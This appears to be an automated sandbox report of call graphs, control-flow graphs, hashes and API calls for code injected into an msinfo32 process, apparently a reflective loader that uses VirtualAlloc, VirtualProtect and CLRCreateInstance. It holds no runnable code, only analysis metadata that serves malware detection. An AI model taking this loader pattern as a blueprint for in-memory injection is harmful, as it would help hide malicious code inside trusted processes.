Function_00000204FD6737AF 32->18 69 Function_00000204FD675970 32->69 104 Function_00000204FD675F40 32->104 34 Function_00000204FD6735BB 66 Function_00000204FD675F64 34->66 35 Function_00000204FD673EBA 36 Function_00000204FD6734B8 37 Function_00000204FD672CB8 37->3 50 Function_00000204FD672D84 37->50 38 Function_00000204FD6709B8 39 Function_00000204FD6735B6 40 Function_00000204FD6736B4 40->15 40->18 40->69 40->104 119 Function_00000204FD673220 41->119 42 Function_00007FFD9B8A041D 43 Function_00000204FD6754C2 43->22 43->33 43->66 77 Function_00000204FD673383 43->77 99 Function_00000204FD673F2C 43->99 44 Function_00000204FD673EC2 45 Function_00007FFD9B8A0120 46 Function_00000204FD6702C0 46->3 46->8 46->17 46->37 47 Function_00000204FD673689 48 Function_00000204FD660087 49 Function_00000204FD675685 49->25 49->69 49->104 51 Function_00007FFD9B8A0250 52 Function_00000204FD673E8E 53 Function_00000204FD67318C 54 Function_00000204FD670D98 55 Function_00007FFD9B8A0849 56 Function_00007FFD9B8A0949 56->19 57 Function_00000204FD673E96 58 Function_00000204FD673695 60 Function_00007FFD9B8A0C42 61 Function_00000204FD67369F 62 Function_00000204FD673E9E 63 Function_00000204FD67119C 63->3 63->8 63->17 63->30 63->37 63->38 63->41 63->46 75 Function_00000204FD671578 63->75 86 Function_00000204FD672F48 63->86 87 Function_00000204FD672C44 63->87 94 Function_00000204FD67245C 63->94 95 Function_00000204FD670F28 63->95 98 Function_00000204FD670230 63->98 111 Function_00000204FD670104 63->111 64->11 107 Function_00000204FD670908 64->107 65 Function_00000204FD673469 67 Function_00000204FD670173 67->17 67->64 68 Function_00000204FD674273 74 Function_00000204FD675F79 68->74 69->74 69->76 70 Function_00000204FD67346E 71 Function_00000204FD66016F 72 Function_00000204FD67336C 73 Function_00000204FD67337B 76->18 76->69 77->15 78 Function_00007FFD9B8A055D 78->4 78->45 78->51 79 Function_00000204FD670A82 80 Function_00000204FD673E7F 81 Function_00000204FD66017C 82 Function_00000204FD67324A 82->12 82->15 97 Function_00000204FD674524 82->97 83 Function_00000204FD660249 84 Function_00000204FD670B48 85->11 86->53 88 Function_00000204FD670750 87->88 88->37 88->107 89 Function_00000204FD674250 90 Function_00000204FD673459 91->17 91->26 91->64 92 Function_00000204FD674C54 92->18 92->33 92->49 92->66 92->68 92->69 92->74 92->104 93 Function_00000204FD674260 94->3 94->84 96 Function_00000204FD670E28 97->9 97->12 97->18 97->27 97->32 97->40 97->43 97->66 97->92 100 Function_00000204FD675C38 97->100 103 Function_00000204FD675D43 97->103 97->104 97->114 117 Function_00000204FD673818 97->117 118 Function_00000204FD674315 97->118 98->17 98->41 98->64 99->15 99->33 101 Function_00000204FD674238 102 Function_00000204FD670E34 103->2 120 Function_00000204FD675F1D 103->120 105 Function_00007FFD9B8A07D6 106 Function_00000204FD67360B 107->41 107->64 108 Function_00000204FD670E08 109 Function_00000204FD673F06 110 Function_00000204FD673606 111->17 111->41 111->64 112 Function_00007FFD9B8A0DD0 113 Function_00007FFD9B8A0AD1 113->14 114->24 114->66 115 Function_00007FFD9B8A02D3 116 Function_00007FFD9B8A03D3 117->66 117->100 117->104 117->114 118->33 120->2

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 100 204fd67119c-204fd6711f4 call 204fd672c44 * 3 107 204fd671226 100->107 108 204fd6711f6-204fd6711f9 100->108 110 204fd671229-204fd671244 107->110 108->107 109 204fd6711fb-204fd6711fe 108->109 109->107 111 204fd671200-204fd671217 VirtualAlloc 109->111 112 204fd671219-204fd671220 111->112 113 204fd671245-204fd67126e call 204fd6731c4 call 204fd6731e4 111->113 112->107 114 204fd671222 112->114 119 204fd6712aa-204fd6712c0 call 204fd672c44 113->119 120 204fd671270-204fd6712a4 call 204fd672df8 call 204fd672cb8 113->120 114->107 119->107 126 204fd6712c6-204fd6712c7 119->126 120->119 129 204fd6714ff-204fd671500 120->129 128 204fd6712cd-204fd6712d3 126->128 130 204fd6712d5 128->130 131 204fd671310-204fd67131b 128->131 134 204fd671505-204fd671516 129->134 135 204fd6712d7-204fd6712d9 130->135 132 204fd671350-204fd671359 131->132 133 204fd67131d-204fd671337 call 204fd672c44 131->133 137 204fd67135b-204fd67136b call 204fd6702c0 132->137 138 204fd67137a-204fd671383 132->138 151 204fd671339-204fd671340 133->151 152 204fd671346-204fd67134e 133->152 139 204fd671549-204fd67156a call 204fd6731e4 134->139 140 204fd671518-204fd671522 134->140 141 204fd6712db-204fd6712e1 135->141 142 204fd6712f2-204fd6712f4 135->142 137->134 161 204fd671371-204fd671378 137->161 138->134 148 204fd671389-204fd671393 138->148 169 204fd671570-204fd671572 139->169 170 204fd67156c 139->170 140->139 146 204fd671524-204fd671542 call 204fd6731e4 140->146 141->142 147 204fd6712e3-204fd6712f0 141->147 142->131 149 204fd6712f6-204fd67130e call 204fd6729b4 142->149 146->139 147->135 147->142 155 204fd671395-204fd671396 148->155 156 204fd67139d-204fd6713a4 148->156 149->128 151->129 151->152 152->132 152->133 155->156 158 204fd6713d8-204fd6713dc 156->158 159 204fd6713a6-204fd6713a7 156->159 165 204fd6713e2-204fd67140b 158->165 166 204fd67148f-204fd671497 158->166 163 204fd6713a9 call 204fd670104 159->163 161->156 168 204fd6713ae-204fd6713b0 163->168 165->134 182 204fd671411-204fd67142b call 204fd6731c4 165->182 171 204fd6714e9-204fd6714ef call 204fd6719a8 166->171 172 204fd671499-204fd67149f 166->172 173 204fd6713b2-204fd6713b9 168->173 174 204fd6713bf-204fd6713c2 call 204fd670230 168->174 169->110 170->169 180 204fd6714f4-204fd6714fb 171->180 176 204fd6714b6-204fd6714c8 call 204fd670f28 172->176 177 204fd6714a1-204fd6714a7 172->177 173->134 173->174 184 204fd6713c7-204fd6713c9 174->184 189 204fd6714da-204fd6714e7 call 204fd6709b8 176->189 190 204fd6714ca-204fd6714d5 call 204fd671578 176->190 177->180 181 204fd6714a9-204fd6714b4 call 204fd67245c 177->181 180->134 185 204fd6714fd 180->185 181->180 196 204fd671447-204fd67148a 182->196 197 204fd67142d-204fd671430 182->197 184->158 191 204fd6713cb-204fd6713d2 184->191 185->185 189->180 190->189 191->134 191->158 196->134 203 204fd67148c-204fd67148d 196->203 197->166 198 204fd671432-204fd671445 call 204fd672f48 197->198 198->203 203->166
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
                • Instruction ID: dbdaba800f1c6c2dd3255913fbbb1e6ad07ba2db10471ddd918a39c97f3bcc80
                • Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
                • Instruction Fuzzy Hash: CFC1B571314F0E4BFB59FA28C49D7A9B3D3FB98300F14926AD95AC3587DF24E9428681

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual$LibraryLoad
                • String ID:
                • API String ID: 895956442-0
                • Opcode ID: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
                • Instruction ID: d6f2d304afe49892b07ed20e6e618ff9fb1e77298dcffe052e1c0d5b343aed01
                • Opcode Fuzzy Hash: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
                • Instruction Fuzzy Hash: 9531B23130CB0D4BEB58FE28A84D36AB3D6E7C8721F004269A95BC32CADD61DD0646D1

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
                • Instruction ID: 60afd5dc3ce1c8bc78ee4392cfca906f8d8e316d217ed9667d62ab2c583985dd
                • Opcode Fuzzy Hash: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
                • Instruction Fuzzy Hash: F121903170CB0D4BEB58FA5CA859369B3D2E7C8721F10426AED4BC32CADD20DD024681

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: AllocArrayCreateDestroyInstanceSafeString
                • String ID:
                • API String ID: 815377780-0
                • Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
                • Instruction ID: 9021d1a40c1f2a092e67c1300cb5005f31a14ed5913c49a2274d8573697bc836
                • Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
                • Instruction Fuzzy Hash: 05816E31218A498FE768EF28C88DBA6B7E5FF99301F00462ED58AC7551DF34E505CB82

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID: l
                • API String ID: 1029625771-2517025534
                • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                • Instruction ID: 44b4e6b6d51b1467b1c1a562a0cba7e1b8bce3ddfd2c21d3fad422fd759a4a89
                • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                • Instruction Fuzzy Hash: E331A660918B8A4FF755EB2DC048726BBD5FBAD308F2496ACC1DAC7553DB20D8468701

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual$LibraryLoad
                • String ID:
                • API String ID: 895956442-0
                • Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
                • Instruction ID: c4409b8d5e3f47fe3c1d39613534cabe9b62d79708722f3332b41224eef71b39
                • Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
                • Instruction Fuzzy Hash: 0B11A571718B0D4BEB94FB18988D76A73E6FBD8301F044579AC4AC7286DE20DD418781

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 204 7ffd9b8a0e15-7ffd9b8a1203 206 7ffd9b8a120a-7ffd9b8a1228 204->206
                Memory Dump Source
                • Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7277c7d57855d524ea7edf9281791e0e883ec3216df7c0ee9cba3e14f5052c05
                • Instruction ID: 9d584c2727862a7fc835432ddbdad988a98efce5f93564618e0c4be1aaa8a52d
                • Opcode Fuzzy Hash: 7277c7d57855d524ea7edf9281791e0e883ec3216df7c0ee9cba3e14f5052c05
                • Instruction Fuzzy Hash: 0B012B55A0C7880FE3469B3824718E57FA0DF66344B0900E7E898CB1F7E8189A458351

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e823a0291c79aed59e202d04a7b6b1d2cdb4b9424cc41d49109277549d55ab81
                • Instruction ID: 51f14ab6a415b216947ab163fec291f08e02e485175abd0d0f486ec58ae7ab4b
                • Opcode Fuzzy Hash: e823a0291c79aed59e202d04a7b6b1d2cdb4b9424cc41d49109277549d55ab81
                • Instruction Fuzzy Hash: A8712761F1DA8D0FE799A77854799E97BB1EFAA34070100FAD05DC71E7EC1CA9068311

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 918ce3a8bc5cdb2fdb371311f41d8031a3a9316995401ebb36b54f991c503058
                • Instruction ID: 325e4dd860bd011faf3448bc35725e4c0294d1c67bcbf040d78942397eaf203d
                • Opcode Fuzzy Hash: 918ce3a8bc5cdb2fdb371311f41d8031a3a9316995401ebb36b54f991c503058
                • Instruction Fuzzy Hash: C841FBB1E18A8E4FEB49EB6894A1AE97BB1EFA9300F4500F5D01DC72E7DD289901C711

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7e264f2c48f12d0aca4eda5c20e98f01d507bc74bbeab06c2d3fee88cfd2ac62
                • Instruction ID: 0aaacd236f4cf942d536f4fd330e45c72f35fdbfaa0471f59b2dc94d2208926c
                • Opcode Fuzzy Hash: 7e264f2c48f12d0aca4eda5c20e98f01d507bc74bbeab06c2d3fee88cfd2ac62
                • Instruction Fuzzy Hash: 62310921F189495FE784BBAC58697BC77E2EFD8715F0542B6E00CC32D6DD28580283A2

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 369 7ffd9b8a0849-7ffd9b8a0918 383 7ffd9b8a0921-7ffd9b8a0944 369->383
                Memory Dump Source
                • Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5bb5fab5153de021237691ff41db927f7f3a5b03a5a5511406bacf282f83aec2
                • Instruction ID: a83451081478499cd7a595021b91c3e82218e8bd7854f63653572abae2b75225
                • Opcode Fuzzy Hash: 5bb5fab5153de021237691ff41db927f7f3a5b03a5a5511406bacf282f83aec2
                • Instruction Fuzzy Hash: 2D318F20B1CA494FEB88EF2C946A778B2C2EF9C315F0505BEA05EC72E7DD289C418741

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 386 7ffd9b8a07d6-7ffd9b8a0824 388 7ffd9b8a0826-7ffd9b8a0830 386->388 389 7ffd9b8a0837-7ffd9b8a0840 388->389 391 7ffd9b8a0842 389->391 391->391
                Memory Dump Source
                • Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3818cd240d33096a9710850cea94d5513eeb07ed4290f7288cb031f6915b1747
                • Instruction ID: 373d01eb6402902d1f676fa5385d7001b1ab73c37f3856c0722de03ca0eca340
                • Opcode Fuzzy Hash: 3818cd240d33096a9710850cea94d5513eeb07ed4290f7288cb031f6915b1747
                • Instruction Fuzzy Hash: 6601F94245F6D21FD797467948695A23FE9CED756470E00FBE58CCA1A3D84D1807C3B2

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 392 7ffd9b8a0120-7ffd9b8a0830 395 7ffd9b8a0837-7ffd9b8a0840 392->395 397 7ffd9b8a0842 395->397 397->397
                Memory Dump Source
                • Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 20baf954922f6c5b81e7997157e10f50dbc2b6af09f42db46af39aedff20b238
                • Instruction ID: cff8b6e457dc76a8d46a5d831518753cb63dca7928794cde36dc42ed8e8cd607
                • Opcode Fuzzy Hash: 20baf954922f6c5b81e7997157e10f50dbc2b6af09f42db46af39aedff20b238
                • Instruction Fuzzy Hash: 1FE0C043A2B40D0BE2B8501D0C6D472478CDFE89987150436F10DC22A2EC442C0341E1

                Execution Graph

                Execution Coverage:11.4%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:89
                Total number of Limit Nodes:4
                execution_graph 2542 27aded7119c 2568 27aded72c44 2542->2568 2545 27aded72c44 LoadLibraryA 2546 27aded711d8 2545->2546 2547 27aded72c44 LoadLibraryA 2546->2547 2548 27aded711ee 2547->2548 2549 27aded71200 VirtualAlloc 2548->2549 2552 27aded71219 2548->2552 2550 27aded71245 2549->2550 2549->2552 2551 27aded72c44 LoadLibraryA 2550->2551 2550->2552 2554 27aded712b9 2551->2554 2553 27aded72c44 LoadLibraryA 2555 27aded71310 2553->2555 2554->2552 2554->2555 2588 27aded729b4 2554->2588 2555->2552 2555->2553 2557 27aded71350 2555->2557 2557->2552 2567 27aded713d8 2557->2567 2592 27aded70104 2557->2592 2559 27aded714e9 2606 27aded719a8 2559->2606 2560 27aded71499 2560->2552 2581 27aded70f28 2560->2581 2561 27aded713ae 2562 27aded713b2 2561->2562 2572 27aded70230 2561->2572 2562->2552 2562->2561 2567->2552 2567->2559 2567->2560 2569 27aded72c7b 2568->2569 2570 27aded711c5 2569->2570 2616 27aded70750 2569->2616 2570->2545 2573 27aded729b4 LoadLibraryA 2572->2573 2574 27aded7024e 2573->2574 2575 27aded72a9c LoadLibraryA 2574->2575 2576 27aded70263 2575->2576 2577 27aded702ad 2576->2577 2578 27aded7026b VirtualProtect 2576->2578 2577->2552 2577->2567 2578->2577 2579 27aded70285 2578->2579 2580 27aded70297 VirtualProtect 2579->2580 2580->2577 2582 27aded70f65 CLRCreateInstance 2581->2582 2584 27aded70f7e 2581->2584 2582->2584 2583 27aded7102d 2583->2552 2584->2583 2585 27aded7108b SysAllocString 2584->2585 2586 27aded7105f 2584->2586 2585->2586 2586->2583 2587 27aded71171 SafeArrayDestroy 2586->2587 2587->2583 2590 27aded729d2 2588->2590 2589 27aded72a7d LoadLibraryA 2591 27aded72a85 2589->2591 2590->2589 2590->2591 2591->2554 2593 27aded729b4 LoadLibraryA 2592->2593 2594 27aded70123 2593->2594 2595 27aded7012b 2594->2595 2596 27aded72a9c LoadLibraryA 2594->2596 2595->2561 2597 27aded7014a 2596->2597 2597->2595 2598 27aded7016d VirtualProtect 2597->2598 2598->2595 2599 27aded7018b 2598->2599 2600 27aded70199 VirtualProtect 2599->2600 2601 27aded72a9c LoadLibraryA 2600->2601 2602 27aded701c1 2601->2602 2602->2595 2603 27aded701dc VirtualProtect 2602->2603 2603->2595 2604 27aded701f5 2603->2604 2605 27aded70203 VirtualProtect 2604->2605 2605->2595 2610 27aded719fc 2606->2610 2607 27aded729b4 LoadLibraryA 2607->2610 2608 27aded729b4 LoadLibraryA 2609 27aded71e59 2608->2609 2609->2608 2612 27aded72a9c LoadLibraryA 2609->2612 2613 27aded71ef8 2609->2613 2610->2607 2610->2609 2611 27aded72a9c LoadLibraryA 2610->2611 2615 27aded72230 2610->2615 2611->2610 2612->2609 2613->2615 2630 27aded72758 2613->2630 2615->2552 2617 27aded70790 2616->2617 2619 27aded70827 2616->2619 2617->2619 2620 27aded70908 2617->2620 2619->2569 2623 27aded7094b 2620->2623 2625 27aded70974 2620->2625 2621 27aded70984 2621->2619 2622 27aded729b4 LoadLibraryA 2622->2621 2623->2621 2623->2625 2626 27aded72a9c 2623->2626 2625->2621 2625->2622 2627 27aded72ad2 2626->2627 2629 27aded72c0c 2626->2629 2628 27aded70908 LoadLibraryA 2627->2628 2627->2629 2628->2629 2629->2623 2633 27aded72794 2630->2633 2631 27aded72990 2631->2615 2632 27aded72a9c LoadLibraryA 2632->2633 2633->2631 2633->2632 2634 27aded70173 VirtualProtect 2635 27aded7018b 2634->2635 2642 27aded7012b 2634->2642 2636 27aded70199 VirtualProtect 2635->2636 2637 27aded72a9c LoadLibraryA 2636->2637 2638 27aded701c1 2637->2638 2639 27aded701dc VirtualProtect 2638->2639 2638->2642 2640 27aded701f5 2639->2640 2639->2642 2641 27aded70203 VirtualProtect 2640->2641 2641->2642

                Callgraph

                • Executed
                • Not Executed
                • Opacity -> Relevance
                • Disassembly available
                callgraph 0 Function_0000027ADED75B0E 32 Function_0000027ADED75BD5 0->32 120 Function_0000027ADED75F64 0->120 1 Function_00007FFD9B8C0BFA 2 Function_0000027ADED7360B 3 Function_00007FFD9B8C01F0 4 Function_0000027ADED73818 4->0 19 Function_0000027ADED75C38 4->19 96 Function_0000027ADED75F40 4->96 4->120 5 Function_0000027ADED74315 75 Function_0000027ADED758AD 5->75 6 Function_00007FFD9B8C00F2 7 Function_0000027ADED73200 8 Function_0000027ADED733FA 9 Function_0000027ADED70908 81 Function_0000027ADED729B4 9->81 87 Function_0000027ADED72A9C 9->87 10 Function_0000027ADED70E08 11 Function_0000027ADED73606 12 Function_0000027ADED73F06 13 Function_0000027ADED70104 43 Function_0000027ADED731C4 13->43 13->81 13->87 14 Function_00007FFD9B8C0218 15 Function_0000027ADED70230 15->43 15->81 15->87 16 Function_00007FFD9B8C0E15 17 Function_0000027ADED73F2C 40 Function_0000027ADED758C8 17->40 17->75 18 Function_00007FFD9B8C0210 20 Function_0000027ADED74238 21 Function_0000027ADED70E34 22 Function_0000027ADED73220 23 Function_00007FFD9B8C000C 24 Function_0000027ADED75F1D 56 Function_0000027ADED75EE6 24->56 25 Function_0000027ADED70E28 26 Function_0000027ADED70F28 27 Function_0000027ADED74524 27->0 27->4 27->5 27->19 31 Function_0000027ADED75ACB 27->31 35 Function_0000027ADED758D2 27->35 44 Function_0000027ADED754C2 27->44 50 Function_0000027ADED748F4 27->50 51 Function_0000027ADED73DE1 27->51 74 Function_0000027ADED737AF 27->74 82 Function_0000027ADED736B4 27->82 95 Function_0000027ADED74C54 27->95 27->96 102 Function_0000027ADED75D43 27->102 27->120 28 Function_0000027ADED73BD0 28->0 111 Function_0000027ADED73D75 28->111 29 Function_0000027ADED758CD 30 Function_0000027ADED734CD 30->40 31->28 33 Function_0000027ADED742D4 34 Function_0000027ADED70ED4 83 Function_0000027ADED75FA0 35->83 36 Function_0000027ADED702C0 36->43 48 Function_0000027ADED72DF8 36->48 57 Function_0000027ADED731E4 36->57 78 Function_0000027ADED72CB8 36->78 37 Function_0000027ADED735BB 37->120 38 Function_0000027ADED73EBA 39 Function_00007FFD9B8C0120 40->29 41 Function_0000027ADED741C7 42 Function_00007FFD9B8C041D 44->17 44->30 72 Function_0000027ADED73383 44->72 44->75 44->120 45 Function_0000027ADED73EC2 46 Function_0000027ADED73EEC 47 Function_00007FFD9B8C0250 49 Function_0000027ADED70AF4 50->75 52 Function_0000027ADED70AE0 53 Function_00007FFD9B8C0849 54 Function_00007FFD9B8C0949 54->18 55 Function_0000027ADED601E8 58 Function_00007FFD9B8C0C42 59 Function_0000027ADED73E8E 60 Function_0000027ADED7318C 61 Function_0000027ADED70D98 62 Function_0000027ADED73E96 63 Function_0000027ADED73695 64 Function_0000027ADED73E7F 65 Function_0000027ADED6017C 66 Function_0000027ADED7337B 67 Function_0000027ADED73689 68 Function_00007FFD9B8C055D 68->3 68->39 68->47 69 Function_0000027ADED60087 70 Function_0000027ADED75685 70->33 70->96 103 Function_0000027ADED75970 70->103 71 Function_0000027ADED72D84 72->40 73 Function_0000027ADED70A82 74->35 74->96 74->103 76 Function_0000027ADED736AB 77 Function_0000027ADED709B8 78->57 78->71 79 Function_0000027ADED734B8 80 Function_0000027ADED735B6 81->22 82->35 82->40 82->96 82->103 84 Function_0000027ADED7369F 85 Function_0000027ADED73E9E 86 Function_0000027ADED7119C 86->13 86->15 86->26 86->36 86->43 86->48 86->57 86->77 86->78 86->81 88 Function_0000027ADED719A8 86->88 100 Function_0000027ADED72F48 86->100 101 Function_0000027ADED72C44 86->101 110 Function_0000027ADED71578 86->110 118 Function_0000027ADED7245C 86->118 87->7 87->9 88->7 88->43 88->57 88->81 88->87 94 Function_0000027ADED72758 88->94 99 Function_0000027ADED70E48 88->99 89 Function_0000027ADED70AA4 90 Function_0000027ADED70750 90->9 90->78 91 Function_0000027ADED74250 92 Function_0000027ADED7324A 92->27 92->31 92->40 93 Function_0000027ADED73459 94->34 94->43 94->87 95->35 95->70 95->75 95->96 95->103 109 Function_0000027ADED75F79 95->109 115 Function_0000027ADED74273 95->115 95->120 97 Function_0000027ADED60249 98 Function_0000027ADED70B48 99->7 100->60 101->90 102->24 102->56 103->109 103->111 104 Function_00007FFD9B8C07D6 105 Function_0000027ADED7346E 106 Function_0000027ADED6016F 107 Function_0000027ADED7336C 108 Function_00007FFD9B8C0DD0 111->35 111->103 112 Function_00007FFD9B8C02D3 113 Function_00007FFD9B8C03D3 114 Function_0000027ADED70173 114->43 114->87 115->109 116 Function_00007FFD9B8C0AD1 116->14 117 Function_0000027ADED74260 118->57 118->98 119 Function_0000027ADED73469

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 100 27aded7119c-27aded711f4 call 27aded72c44 * 3 107 27aded71226 100->107 108 27aded711f6-27aded711f9 100->108 109 27aded71229-27aded71244 107->109 108->107 110 27aded711fb-27aded711fe 108->110 110->107 111 27aded71200-27aded71217 VirtualAlloc 110->111 112 27aded71219-27aded71220 111->112 113 27aded71245-27aded7126e call 27aded731c4 call 27aded731e4 111->113 112->107 115 27aded71222 112->115 119 27aded71270-27aded712a4 call 27aded72df8 call 27aded72cb8 113->119 120 27aded712aa-27aded712c0 call 27aded72c44 113->120 115->107 119->120 131 27aded714ff-27aded71500 119->131 120->107 126 27aded712c6-27aded712c7 120->126 127 27aded712cd-27aded712d3 126->127 129 27aded71310-27aded7131b 127->129 130 27aded712d5 127->130 134 27aded71350-27aded71359 129->134 135 27aded7131d-27aded71337 call 27aded72c44 129->135 132 27aded712d7-27aded712d9 130->132 133 27aded71505-27aded71516 131->133 138 27aded712db-27aded712e1 132->138 139 27aded712f2-27aded712f4 132->139 140 27aded71549-27aded7156a call 27aded731e4 133->140 141 27aded71518-27aded71522 133->141 136 27aded7135b-27aded7136b call 27aded702c0 134->136 137 27aded7137a-27aded71383 134->137 156 27aded71339-27aded71340 135->156 157 27aded71346-27aded7134e 135->157 136->133 158 27aded71371-27aded71378 136->158 137->133 146 27aded71389-27aded71393 137->146 138->139 144 27aded712e3-27aded712f0 138->144 139->129 147 27aded712f6-27aded7130e call 27aded729b4 139->147 171 27aded71570-27aded71572 140->171 172 27aded7156c 140->172 141->140 145 27aded71524-27aded71542 call 27aded731e4 141->145 144->132 144->139 145->140 152 27aded7139d-27aded713a4 146->152 153 27aded71395-27aded71396 146->153 147->127 160 27aded713d8-27aded713dc 152->160 161 27aded713a6-27aded713a7 152->161 153->152 156->131 156->157 157->134 157->135 158->152 163 27aded7148f-27aded71497 160->163 164 27aded713e2-27aded7140b 160->164 165 27aded713a9 call 27aded70104 161->165 167 27aded714e9-27aded714ef call 27aded719a8 163->167 168 27aded71499-27aded7149f 163->168 164->133 181 27aded71411-27aded7142b call 27aded731c4 164->181 170 27aded713ae-27aded713b0 165->170 180 27aded714f4-27aded714fb 167->180 173 27aded714a1-27aded714a7 168->173 174 27aded714b6-27aded714c8 call 27aded70f28 168->174 176 27aded713bf-27aded713c2 call 27aded70230 170->176 177 27aded713b2-27aded713b9 170->177 171->109 172->171 179 27aded714a9-27aded714b4 call 27aded7245c 173->179 173->180 191 27aded714da-27aded714e7 call 27aded709b8 174->191 192 27aded714ca-27aded714d5 call 27aded71578 174->192 188 27aded713c7-27aded713c9 176->188 177->133 177->176 179->180 180->133 184 27aded714fd 180->184 194 27aded7142d-27aded71430 181->194 195 27aded71447-27aded7148a 181->195 184->184 188->160 193 27aded713cb-27aded713d2 188->193 191->180 192->191 193->133 193->160 194->163 198 27aded71432-27aded71445 call 27aded72f48 194->198 195->133 203 27aded7148c-27aded7148d 195->203 198->203 203->163
                APIs
                Memory Dump Source
